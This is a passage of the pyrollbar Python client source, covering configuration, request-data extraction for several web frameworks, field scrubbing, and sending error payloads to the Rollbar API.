log.error('Rollbar internal error: %s', err.value)
else:
report_exc_info((err.type, err.value, err.getTracebackObject()))
except:
log.exception('Error while reporting to Rollbar')
# Add Rollbar as a log handler which will report uncaught errors
twisted_log.addObserver(log_handler)
except ImportError:
treq = None
try:
from falcon import Request as FalconRequest
except ImportError:
FalconRequest = None
def get_request():
"""
Get the current request object. Implementation varies on
library support. Modified below when we know which framework
is being used.
"""
# TODO(cory): add in a generic _get_locals_request() which
# will iterate up through the call stack and look for a variable
# that appears to be valid request object.
for fn in (_get_bottle_request,
_get_flask_request,
_get_pyramid_request,
_get_pylons_request):
try:
req = fn()
if req is not None:
return req
except:
pass
return None
def _get_bottle_request():
if BottleRequest is None:
return None
from bottle import request
return request
def _get_flask_request():
if WerkzeugRequest is None:
return None
from flask import request
return request
def _get_pyramid_request():
if WebobBaseRequest is None:
return None
from pyramid.threadlocal import get_current_request
return get_current_request()
def _get_pylons_request():
if WebobBaseRequest is None:
return None
from pylons import request
return request
BASE_DATA_HOOK = None
agent_log = None
VERSION = __version__
DEFAULT_ENDPOINT = 'https://api.rollbar.com/api/1/'
DEFAULT_TIMEOUT = 3
ANONYMIZE = 'anonymize'
DEFAULT_LOCALS_SIZES = {
'maxlevel': 5,
'maxdict': 10,
'maxlist': 10,
'maxtuple': 10,
'maxset': 10,
'maxfrozenset': 10,
'maxdeque': 10,
'maxarray': 10,
'maxstring': 100,
'maxlong': 40,
'maxother': 100,
}
# configuration settings
# configure by calling init() or overriding directly
SETTINGS = {
'access_token': None,
'enabled': True,
'environment': 'production',
'exception_level_filters': [],
'root': None, # root path to your code
'branch': None, # git branch name
'code_version': None,
'handler': 'thread', # 'blocking', 'thread', 'agent', 'tornado', 'gae' or 'twisted'
'endpoint': DEFAULT_ENDPOINT,
'timeout': DEFAULT_TIMEOUT,
'agent.log_file': 'log.rollbar',
'scrub_fields': [
'pw',
'passwd',
'password',
'secret',
'confirm_password',
'confirmPassword',
'password_confirmation',
'passwordConfirmation',
'access_token',
'accessToken',
'auth',
'authentication',
],
'url_fields': ['url', 'link', 'href'],
'notifier': {
'name': 'pyrollbar',
'version': VERSION
},
'allow_logging_basic_config': True, # set to False to avoid a call to logging.basicConfig()
'locals': {
'enabled': True,
'safe_repr': True,
'scrub_varargs': True,
'sizes': DEFAULT_LOCALS_SIZES,
'whitelisted_types': []
},
'verify_https': True,
'shortener_keys': [],
'suppress_reinit_warning': False,
'capture_email': False,
'capture_username': False,
'capture_ip': True,
'log_all_rate_limited_items': True,
'http_proxy': None,
'http_proxy_user': None,
'http_proxy_password': None,
}
_CURRENT_LAMBDA_CONTEXT = None
_LAST_RESPONSE_STATUS = None
# Set in init()
_transforms = []
_serialize_transform = None
_initialized = False
from rollbar.lib.transforms.scrub_redact import REDACT_REF
from rollbar.lib import transforms
from rollbar.lib.transforms.scrub import ScrubTransform
from rollbar.lib.transforms.scruburl import ScrubUrlTransform
from rollbar.lib.transforms.scrub_redact import ScrubRedactTransform
from rollbar.lib.transforms.serializable import SerializableTransform
from rollbar.lib.transforms.shortener import ShortenerTransform
## public api
def init(access_token, environment='production', scrub_fields=None, url_fields=None, **kw):
"""
Saves configuration variables in this module's SETTINGS.
access_token: project access token. Get this from the Rollbar UI:
- click "Settings" in the top nav
- click "Projects" in the left nav
- copy-paste the appropriate token.
environment: environment name. Can be any string; suggestions: 'production', 'development',
'staging', 'yourname'
**kw: provided keyword arguments will override keys in SETTINGS.
"""
global SETTINGS, agent_log, _initialized, _transforms, _serialize_transform, _threads
if scrub_fields is not None:
SETTINGS['scrub_fields'] = list(scrub_fields)
if url_fields is not None:
SETTINGS['url_fields'] = list(url_fields)
# Merge the extra config settings into SETTINGS
SETTINGS = dict_merge(SETTINGS, kw)
if _initialized:
# NOTE: Temp solution to not being able to re-init.
# New versions of pyrollbar will support re-initialization
# via the (not-yet-implemented) configure() method.
if not SETTINGS.get('suppress_reinit_warning'):
log.warning('Rollbar already initialized. Ignoring re-init.')
return
SETTINGS['access_token'] = access_token
SETTINGS['environment'] = environment
if SETTINGS.get('allow_logging_basic_config'):
logging.basicConfig()
if SETTINGS.get('handler') == 'agent':
agent_log = _create_agent_log()
# We will perform these transforms in order:
# 1. Serialize the payload to be all python built-in objects
# 2. Scrub the payloads based on the key suffixes in SETTINGS['scrub_fields']
# 3. Scrub URLs in the payload for keys that end with 'url'
# 4. Optional - If local variable gathering is enabled, transform the
# trace frame values using the ShortReprTransform.
_serialize_transform = SerializableTransform(safe_repr=SETTINGS['locals']['safe_repr'],
whitelist_types=SETTINGS['locals']['whitelisted_types'])
_transforms = [
ScrubRedactTransform(),
_serialize_transform,
ScrubTransform(suffixes=[(field,) for field in SETTINGS['scrub_fields']], redact_char='*'),
ScrubUrlTransform(suffixes=[(field,) for field in SETTINGS['url_fields']], params_to_scrub=SETTINGS['scrub_fields'])
]
# A list of key prefixes to apply our shortener transform to. The request
# being included in the body key is old behavior and is being retained for
# backwards compatibility.
shortener_keys = [
('request', 'POST'),
('request', 'json'),
('body', 'request', 'POST'),
('body', 'request', 'json'),
]
if SETTINGS['locals']['enabled']:
shortener_keys.append(('body', 'trace', 'frames', '*', 'code'))
shortener_keys.append(('body', 'trace', 'frames', '*', 'args', '*'))
shortener_keys.append(('body', 'trace', 'frames', '*', 'kwargs', '*'))
shortener_keys.append(('body', 'trace', 'frames', '*', 'locals', '*'))
shortener_keys.extend(SETTINGS['shortener_keys'])
shortener = ShortenerTransform(safe_repr=SETTINGS['locals']['safe_repr'],
keys=shortener_keys,
**SETTINGS['locals']['sizes'])
_transforms.append(shortener)
_threads = queue.Queue()
events.reset()
filters.add_builtin_filters(SETTINGS)
_initialized = True
def lambda_function(f):
"""
Decorator for making error handling on AWS Lambda easier
"""
@functools.wraps(f)
def wrapper(event, context):
global _CURRENT_LAMBDA_CONTEXT
_CURRENT_LAMBDA_CONTEXT = context
try:
result = f(event, context)
return wait(lambda: result)
except:
cls, exc, trace = sys.exc_info()
report_exc_info((cls, exc, trace.tb_next))
wait()
raise
return wrapper
def report_exc_info(exc_info=None, request=None, extra_data=None, payload_data=None, level=None, **kw):
"""
Reports an exception to Rollbar, using exc_info (from calling sys.exc_info())
exc_info: optional, should be the result of calling sys.exc_info(). If omitted, sys.exc_info() will be called here.
request: optional, a WebOb, Werkzeug-based or Sanic request object.
extra_data: optional, will be included in the 'custom' section of the payload
payload_data: optional, dict that will override values in the final payload
(e.g. 'level' or 'fingerprint')
kw: provided for legacy purposes; unused.
Example usage:
rollbar.init(access_token='YOUR_PROJECT_ACCESS_TOKEN')
try:
do_something()
except:
rollbar.report_exc_info(sys.exc_info(), request, {'foo': 'bar'}, {'level': 'warning'})
"""
if exc_info is None:
exc_info = sys.exc_info()
try:
return _report_exc_info(exc_info, request, extra_data, payload_data, level=level)
except Exception as e:
log.exception("Exception while reporting exc_info to Rollbar. %r", e)
def report_message(message, level='error', request=None, extra_data=None, payload_data=None):
"""
Reports an arbitrary string message to Rollbar.
message: the string body of the message
level: level to report at. One of: 'critical', 'error', 'warning', 'info', 'debug'
request: the request object for the context of the message
extra_data: dictionary of params to include with the message. 'body' is reserved.
payload_data: param names to pass in the 'data' level of the payload; overrides defaults.
"""
try:
return _report_message(message, level, request, extra_data, payload_data)
except Exception as e:
log.exception("Exception while reporting message to Rollbar. %r", e)
def send_payload(payload, access_token):
"""
Sends a payload object, (the result of calling _build_payload() + _serialize_payload()).
Uses the configured handler from SETTINGS['handler']
Available handlers:
- 'blocking': calls _send_payload() (which makes an HTTP request) immediately, blocks on it
- 'thread': starts a single-use thread that will call _send_payload(). returns immediately.
- 'agent': writes to a log file to be processed by rollbar-agent
- 'tornado': calls _send_payload_tornado() (which makes an async HTTP request using tornado's AsyncHTTPClient)
- 'gae': calls _send_payload_appengine() (which makes a blocking call to Google App Engine)
    - 'twisted': calls _send_payload_twisted() (which makes an async HTTP request using Twisted and Treq)
"""
payload = events.on_payload(payload)
if payload is False:
return
payload_str = _serialize_payload(payload)
handler = SETTINGS.get('handler')
if handler == 'blocking':
_send_payload(payload_str, access_token)
elif handler == 'agent':
agent_log.error(payload_str)
elif handler == 'tornado':
if TornadoAsyncHTTPClient is None:
log.error('Unable to find tornado')
return
_send_payload_tornado(payload_str, access_token)
elif handler == 'gae':
if AppEngineFetch is None:
log.error('Unable to find AppEngine URLFetch module')
return
_send_payload_appengine(payload_str, access_token)
elif handler == 'twisted':
if treq is None:
log.error('Unable to find Treq')
return
_send_payload_twisted(payload_str, access_token)
else:
# default to 'thread'
thread = threading.Thread(target=_send_payload, args=(payload_str, access_token))
_threads.put(thread)
thread.start()
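# --- Illustrative sketch (not in the original source) ---------------------------
# The handler listed in send_payload()'s docstring is selected via
# SETTINGS['handler'], which init() accepts as a keyword argument. For short-lived
# scripts the 'blocking' handler avoids the background sender thread. The access
# token below is a placeholder.
def _example_use_blocking_handler(access_token):
    init(access_token, environment='development', handler='blocking')
    report_message('handler configured for synchronous delivery', level='info')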
def search_items(title, return_fields=None, access_token=None, endpoint=None, **search_fields):
"""
Searches a project for items that match the input criteria.
title: all or part of the item's title to search for.
return_fields: the fields that should be returned for each item.
e.g. ['id', 'project_id', 'status'] will return a dict containing
only those fields for each item.
access_token: a project access token. If this is not provided,
the one provided to init() will be used instead.
search_fields: additional fields to include in the search.
currently supported: status, level, environment
"""
if not title:
return []
if return_fields is not None:
return_fields = ','.join(return_fields)
return _get_api('search/',
title=title,
fields=return_fields,
access_token=access_token,
endpoint=endpoint,
**search_fields)
def wait(f=None):
_threads.join()
if f is not None:
return f()
class ApiException(Exception):
"""
This exception will be raised if there was a problem decoding the
response from an API call.
"""
pass
class ApiError(ApiException):
"""
This exception will be raised if the API response contains an 'err'
field, denoting there was a problem fulfilling the api request.
"""
pass
class Result(object):
"""
This class encapsulates the response from an API call.
Usage:
result = search_items(title='foo', fields=['id'])
print result.data
"""
def __init__(self, access_token, path, params, data):
self.access_token = access_token
self.path = path
self.params = params
self.data = data
def __str__(self):
return str(self.data)
class PagedResult(Result):
"""
This class wraps the response from an API call that responded with
a page of results.
Usage:
result = search_items(title='foo', fields=['id'])
print 'First page: %d, data: %s' % (result.page, result.data)
result = result.next_page()
print 'Second page: %d, data: %s' % (result.page, result.data)
"""
def __init__(self, access_token, path, page_num, params, data, endpoint=None):
super(PagedResult, self).__init__(access_token, path, params, data)
self.page = page_num
self.endpoint = endpoint
def next_page(self):
params = copy.copy(self.params)
params['page'] = self.page + 1
return _get_api(self.path, endpoint=self.endpoint, **params)
def prev_page(self):
if self.page <= 1:
return self
params = copy.copy(self.params)
params['page'] = self.page - 1
return _get_api(self.path, endpoint=self.endpoint, **params)
## internal functions
def _resolve_exception_class(idx, filter):
cls, level = filter
if isinstance(cls, six.string_types):
# Lazily resolve class name
parts = cls.split('.')
module = '.'.join(parts[:-1])
if module in sys.modules and hasattr(sys.modules[module], parts[-1]):
cls = getattr(sys.modules[module], parts[-1])
SETTINGS['exception_level_filters'][idx] = (cls, level)
else:
cls = None
return cls, level
def _filtered_level(exception):
for i, filter in enumerate(SETTINGS['exception_level_filters']):
cls, level = _resolve_exception_class(i, filter)
if cls and isinstance(exception, cls):
return level
return None
def _is_ignored(exception):
return _filtered_level(exception) == 'ignored'
def _create_agent_log():
"""
Creates .rollbar log file for use with rollbar-agent
"""
log_file = SETTINGS['agent.log_file']
if not log_file.endswith('.rollbar'):
log.error("Provided agent log file does not end with .rollbar, which it must. "
"Using default instead.")
        log_file = 'log.rollbar'  # fall back to the default agent log file name
retval = logging.getLogger('rollbar_agent')
handler = logging.FileHandler(log_file, 'a', 'utf-8')
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
retval.addHandler(handler)
retval.setLevel(logging.WARNING)
return retval
def _report_exc_info(exc_info, request, extra_data, payload_data, level=None):
"""
Called by report_exc_info() wrapper
"""
if not _check_config():
return
filtered_level = _filtered_level(exc_info[1])
if level is None:
level = filtered_level
filtered_exc_info = events.on_exception_info(exc_info,
request=request,
extra_data=extra_data,
payload_data=payload_data,
level=level)
if filtered_exc_info is False:
return
cls, exc, trace = filtered_exc_info
data = _build_base_data(request)
if level is not None:
data['level'] = level
# walk the trace chain to collect cause and context exceptions
trace_chain = _walk_trace_chain(cls, exc, trace)
extra_trace_data = None
if len(trace_chain) > 1:
data['body'] = {
'trace_chain': trace_chain
}
if payload_data and ('body' in payload_data) and ('trace' in payload_data['body']):
extra_trace_data = payload_data['body']['trace']
del payload_data['body']['trace']
else:
data['body'] = {
'trace': trace_chain[0]
}
if extra_data:
extra_data = extra_data
if not isinstance(extra_data, dict):
extra_data = {'value': extra_data}
if extra_trace_data:
extra_data = dict_merge(extra_data, extra_trace_data)
data['custom'] = extra_data
if extra_trace_data and not extra_data:
data['custom'] = extra_trace_data
request = _get_actual_request(request)
_add_request_data(data, request)
_add_person_data(data, request)
_add_lambda_context_data(data)
data['server'] = _build_server_data()
if payload_data:
data = dict_merge(data, payload_data)
payload = _build_payload(data)
send_payload(payload, data.get('access_token'))
return data['uuid']
def _walk_trace_chain(cls, exc, trace):
trace_chain = [_trace_data(cls, exc, trace)]
while True:
exc = getattr(exc, '__cause__', None) or getattr(exc, '__context__', None)
if not exc:
break
trace_chain.append(_trace_data(type(exc), exc, getattr(exc, '__traceback__', None)))
return trace_chain
def _trace_data(cls, exc, trace):
# exception info
# most recent call last
raw_frames = traceback.extract_tb(trace)
frames = [{'filename': f[0], 'lineno': f[1], 'method': f[2], 'code': f[3]} for f in raw_frames]
trace_data = {
'frames': frames,
'exception': {
'class': getattr(cls, '__name__', cls.__class__.__name__),
'message': text(exc),
}
}
_add_locals_data(trace_data, (cls, exc, trace))
return trace_data
def _report_message(message, level, request, extra_data, payload_data):
"""
Called by report_message() wrapper
"""
if not _check_config():
return
filtered_message = events.on_message(message,
request=request,
extra_data=extra_data,
payload_data=payload_data,
level=level)
if filtered_message is False:
return
data = _build_base_data(request, level=level)
# message
data['body'] = {
'message': {
'body': filtered_message
}
}
if extra_data:
extra_data = extra_data
data['body']['message'].update(extra_data)
request = _get_actual_request(request)
_add_request_data(data, request)
_add_person_data(data, request)
_add_lambda_context_data(data)
data['server'] = _build_server_data()
if payload_data:
data = dict_merge(data, payload_data)
payload = _build_payload(data)
send_payload(payload, data.get('access_token'))
return data['uuid']
def _check_config():
if not SETTINGS.get('enabled'):
log.info("pyrollbar: Not reporting because rollbar is disabled.")
return False
# skip access token check for the agent handler
if SETTINGS.get('handler') == 'agent':
return True
# make sure we have an access_token
if not SETTINGS.get('access_token'):
log.warning("pyrollbar: No access_token provided. Please configure by calling rollbar.init() with your access token.")
return False
return True
def _build_base_data(request, level='error'):
data = {
'timestamp': int(time.time()),
'environment': SETTINGS['environment'],
'level': level,
'language': 'python %s' % '.'.join(str(x) for x in sys.version_info[:3]),
'notifier': SETTINGS['notifier'],
'uuid': text(uuid.uuid4()),
}
if SETTINGS.get('code_version'):
data['code_version'] = SETTINGS['code_version']
if BASE_DATA_HOOK:
BASE_DATA_HOOK(request, data)
return data
def _add_person_data(data, request):
try:
person_data = _build_person_data(request)
except Exception as e:
log.exception("Exception while building person data for Rollbar payload: %r", e)
else:
if person_data:
if not SETTINGS['capture_username'] and 'username' in person_data:
person_data['username'] = None
if not SETTINGS['capture_email'] and 'email' in person_data:
person_data['email'] = None
data['person'] = person_data
def _build_person_data(request):
"""
    Returns a dictionary describing the logged-in user using data from `request`.
Try request.rollbar_person first, then 'user', then 'user_id'
"""
if hasattr(request, 'rollbar_person'):
rollbar_person_prop = request.rollbar_person
try:
person = rollbar_person_prop()
except TypeError:
person = rollbar_person_prop
if person and isinstance(person, dict):
return person
else:
return None
if hasattr(request, 'user'):
user_prop = request.user
try:
user = user_prop()
except TypeError:
user = user_prop
if not user:
return None
elif isinstance(user, dict):
return user
else:
retval = {}
if getattr(user, 'id', None):
retval['id'] = text(user.id)
elif getattr(user, 'user_id', None):
retval['id'] = text(user.user_id)
# id is required, so only include username/email if we have an id
if retval.get('id'):
username = getattr(user, 'username', None)
email = getattr(user, 'email', None)
retval.update({
'username': username,
'email': email
})
return retval
if hasattr(request, 'user_id'):
user_id_prop = request.user_id
try:
user_id = user_id_prop()
except TypeError:
user_id = user_id_prop
if not user_id:
return None
return {'id': text(user_id)}
def _get_func_from_frame(frame):
func_name = inspect.getframeinfo(frame).function
caller = frame.f_back
if caller:
func = caller.f_locals.get(func_name,
caller.f_globals.get(func_name))
else:
func = None
return func
def _flatten_nested_lists(l):
ret = []
for x in l:
if isinstance(x, list):
ret.extend(_flatten_nested_lists(x))
else:
ret.append(x)
return ret
def _add_locals_data(trace_data, exc_info):
if not SETTINGS['locals']['enabled']:
return
frames = trace_data['frames']
cur_tb = exc_info[2]
frame_num = 0
num_frames = len(frames)
while cur_tb:
cur_frame = frames[frame_num]
tb_frame = cur_tb.tb_frame
cur_tb = cur_tb.tb_next
if not isinstance(tb_frame, types.FrameType):
# this can happen if the traceback or frame is wrapped in some way,
# for example by `ExceptionInfo` in
# https://github.com/celery/billiard/blob/master/billiard/einfo.py
log.warning('Traceback frame not a types.FrameType. Ignoring.')
frame_num += 1
continue
# Create placeholders for argspec/varargspec/keywordspec/locals
argspec = None
varargspec = None
keywordspec = None
_locals = {}
try:
arginfo = inspect.getargvalues(tb_frame)
# Optionally fill in locals for this frame
if arginfo.locals and _check_add_locals(cur_frame, frame_num, num_frames):
# Get all of the named args
#
# args can be a nested list of args in the case where there
# are anonymous tuple args provided.
# e.g. in Python 2 you can:
# def func((x, (a, b), z)):
# return x + a + b + z
#
# func((1, (1, 2), 3))
argspec = _flatten_nested_lists(arginfo.args)
if arginfo.varargs is not None:
varargspec = arginfo.varargs
if SETTINGS['locals']['scrub_varargs']:
temp_varargs = list(arginfo.locals[varargspec])
for i, arg in enumerate(temp_varargs):
temp_varargs[i] = REDACT_REF
arginfo.locals[varargspec] = tuple(temp_varargs)
if arginfo.keywords is not None:
keywordspec = arginfo.keywords
_locals.update(arginfo.locals.items())
except Exception:
log.exception('Error while extracting arguments from frame. Ignoring.')
# Finally, serialize each arg/kwarg/local separately so that we only report
# CircularReferences for each variable, instead of for the entire payload
# as would be the case if we serialized that payload in one-shot.
if argspec:
cur_frame['argspec'] = argspec
if varargspec:
cur_frame['varargspec'] = varargspec
if keywordspec:
cur_frame['keywordspec'] = keywordspec
if _locals:
try:
cur_frame['locals'] = dict((k, _serialize_frame_data(v)) for k, v in iteritems(_locals))
except Exception:
log.exception('Error while serializing frame data.')
frame_num += 1
def _serialize_frame_data(data):
for transform in (ScrubRedactTransform(), _serialize_transform):
data = transforms.transform(data, transform)
return data
def _add_lambda_context_data(data):
"""
Attempts to add information from the lambda context if it exists
"""
global _CURRENT_LAMBDA_CONTEXT
context = _CURRENT_LAMBDA_CONTEXT
if context is None:
return
try:
lambda_data = {
'lambda': {
'remaining_time_in_millis': context.get_remaining_time_in_millis(),
'function_name': context.function_name,
'function_version': context.function_version,
'arn': context.invoked_function_arn,
'request_id': context.aws_request_id,
}
}
if 'custom' in data:
data['custom'] = dict_merge(data['custom'], lambda_data)
else:
data['custom'] = lambda_data
except Exception as e:
log.exception("Exception while adding lambda context data: %r", e)
finally:
_CURRENT_LAMBDA_CONTEXT = None
def _add_request_data(data, request):
"""
Attempts to build request data; if successful, sets the 'request' key on `data`.
"""
try:
request_data = _build_request_data(request)
except Exception as e:
log.exception("Exception while building request_data for Rollbar payload: %r", e)
else:
if request_data:
_filter_ip(request_data, SETTINGS['capture_ip'])
data['request'] = request_data
def _check_add_locals(frame, frame_num, total_frames):
"""
Returns True if we should record local variables for the given frame.
"""
# Include the last frames locals
# Include any frame locals that came from a file in the project's root
return any(((frame_num == total_frames - 1),
('root' in SETTINGS and (frame.get('filename') or '').lower().startswith((SETTINGS['root'] or '').lower()))))
def _get_actual_request(request):
if WerkzeugLocalProxy and isinstance(request, WerkzeugLocalProxy):
try:
actual_request = request._get_current_object()
except RuntimeError:
return None
return actual_request
return request
def _build_request_data(request):
"""
Returns a dictionary containing data from the request.
Can handle webob or werkzeug-based request objects.
"""
# webob (pyramid)
if WebobBaseRequest and isinstance(request, WebobBaseRequest):
return _build_webob_request_data(request)
# django
if DjangoHttpRequest and isinstance(request, DjangoHttpRequest):
return _build_django_request_data(request)
# django rest framework
if RestFrameworkRequest and isinstance(request, RestFrameworkRequest):
return _build_django_request_data(request)
# werkzeug (flask)
if WerkzeugRequest and isinstance(request, WerkzeugRequest):
return _build_werkzeug_request_data(request)
# tornado
if TornadoRequest and isinstance(request, TornadoRequest):
return _build_tornado_request_data(request)
# bottle
if BottleRequest and isinstance(request, BottleRequest):
return _build_bottle_request_data(request)
# Sanic
if SanicRequest and isinstance(request, SanicRequest):
return _build_sanic_request_data(request)
# falcon
if FalconRequest and isinstance(request, FalconRequest):
return _build_falcon_request_data(request)
# Plain wsgi (should be last)
if isinstance(request, dict) and 'wsgi.version' in request:
return _build_wsgi_request_data(request)
return None
def _build_webob_request_data(request):
request_data = {
'url': request.url,
'GET': dict(request.GET),
'user_ip': _extract_user_ip(request),
'headers': dict(request.headers),
'method': request.method,
}
try:
if request.json:
request_data['json'] = request.json
except:
pass
# pyramid matchdict
if getattr(request, 'matchdict', None):
request_data['params'] = request.matchdict
# workaround for webob bug when the request body contains binary data but has a text
# content-type
try:
request_data['POST'] = dict(request.POST)
except UnicodeDecodeError:
request_data['body'] = request.body
return request_data
def _extract_wsgi_headers(items):
headers = {}
for k, v in items:
if k.startswith('HTTP_'):
header_name = '-'.join(k[len('HTTP_'):].replace('_', ' ').title().split(' '))
headers[header_name] = v
return headers
def _build_django_request_data(request):
request_data = {
'url': request.build_absolute_uri(),
'method': request.method,
'GET': dict(request.GET),
'POST': dict(request.POST),
'user_ip': _wsgi_extract_user_ip(request.META),
}
request_data['headers'] = _extract_wsgi_headers(request.META.items())
return request_data
def _build_werkzeug_request_data(request):
request_data = {
'url': request.url,
'GET': dict(request.args),
'POST': dict(request.form),
'user_ip': _extract_user_ip(request),
'headers': dict(request.headers),
'method': request.method,
'files_keys': list(request.files.keys()),
}
try:
if request.json:
request_data['body'] = request.json
except Exception:
pass
return request_data
def _build_tornado_request_data(request):
request_data = {
'url': request.full_url(),
'user_ip': request.remote_ip,
'headers': dict(request.headers),
'method': request.method,
'files_keys': request.files.keys(),
'start_time': getattr(request, '_start_time', None),
}
request_data[request.method] = request.arguments
return request_data
def _build_bottle_request_data(request):
request_data = {
'url': request.url,
'user_ip': request.remote_addr,
'headers': dict(request.headers),
'method': request.method,
'GET': dict(request.query)
}
if request.json:
try:
request_data['body'] = request.body.getvalue()
except:
pass
else:
request_data['POST'] = dict(request.forms)
return request_data
def _build_sanic_request_data(request):
request_data = {
'url': request.url,
'user_ip': request.remote_addr,
'headers': request.headers,
'method': request.method,
'GET': dict(request.args)
}
if request.json:
try:
request_data['body'] = request.json
except:
pass
else:
request_data['POST'] = request.form
return request_data
def _build_falcon_request_data(request):
request_data = {
'url': request.url,
'user_ip': _wsgi_extract_user_ip(request.env),
'headers': dict(request.headers),
'method': request.method,
'GET': dict(request.params),
'context': dict(request.context),
}
return request_data
def _build_wsgi_request_data(request):
request_data = {
'url': wsgiref.util.request_uri(request),
'user_ip': _wsgi_extract_user_ip(request),
'method': request.get('REQUEST_METHOD'),
}
if 'QUERY_STRING' in request:
request_data['GET'] = parse_qs(request['QUERY_STRING'], keep_blank_values=True)
# Collapse single item arrays
request_data['GET'] = dict((k, v[0] if len(v) == 1 else v) for k, v in request_data['GET'].items())
request_data['headers'] = _extract_wsgi_headers(request.items())
try:
length = int(request.get('CONTENT_LENGTH', 0))
except ValueError:
length = 0
input = request.get('wsgi.input')
if length and input and hasattr(input, 'seek') and hasattr(input, 'tell'):
pos = input.tell()
input.seek(0, 0)
request_data['body'] = input.read(length)
input.seek(pos, 0)
return request_data
def _filter_ip(request_data, capture_ip):
if 'user_ip' not in request_data or capture_ip == True:
return
current_ip = request_data['user_ip']
if not current_ip:
return
new_ip = current_ip
if not capture_ip:
new_ip = None
elif capture_ip == ANONYMIZE:
try:
if '.' in current_ip:
new_ip = '.'.join(current_ip.split('.')[0:3]) + '.0'
elif ':' in current_ip:
parts = current_ip.split(':')
if len(parts) > 2:
terminal = '0000:0000:0000:0000:0000'
new_ip = ':'.join(parts[0:3] + [terminal])
else:
new_ip = None
except:
new_ip = None
request_data['user_ip'] = new_ip
def _build_server_data():
"""
Returns a dictionary containing information about the server environment.
"""
# server environment
server_data = {
'host': socket.gethostname(),
'pid': os.getpid()
}
# argv does not always exist in embedded python environments
argv = getattr(sys, 'argv', None)
if argv:
server_data['argv'] = argv
for key in ['branch', 'root']:
if SETTINGS.get(key):
server_data[key] = SETTINGS[key]
return server_data
def _transform(obj, key=None):
for transform in _transforms:
obj = transforms.transform(obj, transform, key=key)
return obj
def _build_payload(data):
"""
Returns the full payload as a string.
"""
for k, v in iteritems(data):
data[k] = _transform(v, key=(k,))
payload = {
'access_token': SETTINGS['access_token'],
'data': data
}
return payload
def _serialize_payload(payload):
return json.dumps(payload)
def _send_payload(payload_str, access_token):
try:
_post_api('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
try:
_threads.get_nowait()
_threads.task_done()
except queue.Empty:
pass
def _send_payload_appengine(payload_str, access_token):
try:
_post_api_appengine('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
def _post_api_appengine(path, payload_str, access_token=None):
headers = {'Content-Type': 'application/json'}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = access_token
url = urljoin(SETTINGS['endpoint'], path)
resp = AppEngineFetch(url,
method="POST",
payload=payload_str,
headers=headers,
allow_truncated=False,
deadline=SETTINGS.get('timeout', DEFAULT_TIMEOUT),
validate_certificate=SETTINGS.get('verify_https', True))
return _parse_response(path, SETTINGS['access_token'], payload_str, resp)
def _post_api(path, payload_str, access_token=None):
headers = {'Content-Type': 'application/json'}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = access_token
url = urljoin(SETTINGS['endpoint'], path)
resp = transport.post(url,
data=payload_str,
headers=headers,
timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT),
verify=SETTINGS.get('verify_https', True),
proxy=SETTINGS.get('http_proxy'),
proxy_user=SETTINGS.get('http_proxy_user'),
proxy_password=SETTINGS.get('http_proxy_password'))
return _parse_response(path, SETTINGS['access_token'], payload_str, resp)
def _get_api(path, access_token=None, endpoint=None, **params):
access_token = access_token or SETTINGS['access_token']
url = urljoin(endpoint or SETTINGS['endpoint'], path)
params['access_token'] = access_token
resp = transport.get(url,
params=params,
verify=SETTINGS.get('verify_https', True),
proxy=SETTINGS.get('http_proxy'),
proxy_user=SETTINGS.get('http_proxy_user'),
proxy_password=SETTINGS.get('http_proxy_password'))
return _parse_response(path, access_token, params, resp, endpoint=endpoint)
def _send_payload_tornado(payload_str, access_token):
try:
_post_api_tornado('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
def _post_api_tornado(path, payload_str, access_token=None):
headers = {'Content-Type': 'application/json'}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = access_token
else:
access_token = SETTINGS['access_token']
url = urljoin(SETTINGS['endpoint'], path)
def post_tornado_cb(resp):
r = requests.Response()
r._content = resp.body
r.status_code = resp.code
r.headers.update(resp.headers)
try:
_parse_response(path, access_token, payload_str, r)
except Exception as e:
log.exception('Exception while posting item %r', e)
TornadoAsyncHTTPClient().fetch(url,
callback=post_tornado_cb,
raise_error=False,
body=payload_str,
method='POST',
connect_timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT),
request_timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT))
def _send_payload_twisted(payload_str, access_token):
try:
_post_api_twisted('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
def _post_api_twisted(path, payload_str, access_token=None):
def post_data_cb(data, resp):
resp._content = data
_parse_response(path, SETTINGS['access_token'], payload_str, resp)
def post_cb(resp):
r = requests.Response()
r.status_code = resp.code
r.headers.update(resp.headers.getAllRawHeaders())
return treq.content(resp).addCallback(post_data_cb, r)
headers = {'Content-Type': ['application/json']}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = [access_token]
url = urljoin(SETTINGS['endpoint'], path)
d = treq.post(url, payload_str, headers=headers,
timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT))
d.addCallback(post_cb)
def _send_failsafe(message, uuid, host):
body_message = ('Failsafe from pyrollbar: {0}. Original payload may be found '
'in your server logs by searching for the UUID.').format(message)
data = {
'level': 'error',
'environment': SETTINGS['environment'],
'body': {
'message': {
'body': body_message
}
},
'notifier': SETTINGS['notifier'],
'custom': {
'orig_uuid': uuid,
'orig_host': host
},
'failsafe': True,
'internal': True,
}
payload = _build_payload(data)
try:
send_payload(payload, SETTINGS['access_token'])
except Exception:
log.exception('Rollbar: Error sending failsafe.')
def _parse_response(path, access_token, params, resp, endpoint=None):
if isinstance(resp, requests.Response):
try:
data = resp.text
except Exception:
data = resp.content
log.error('resp.text is undefined, resp.content is %r', resp.content)
else:
data = resp.content
global _LAST_RESPONSE_STATUS
last_response_was_429 = _LAST_RESPONSE_STATUS == 429
_LAST_RESPONSE_STATUS = resp.status_code
if resp.status_code == 429:
if SETTINGS['log_all_rate_limited_items'] or not last_response_was_429:
log.warning("Rollbar: over rate limit, data was dropped. Payload was: %r", params)
return
elif resp.status_code == 502:
log.exception('Rollbar api returned a 502')
return
elif resp.status_code == 413:
uuid = None
host = None
try:
payload = json.loads(params)
uuid = payload['data']['uuid']
host = payload['data']['server']['host']
log.error("Rollbar: request entity too large for UUID %r\n. Payload:\n%r", uuid, payload)
except (TypeError, ValueError):
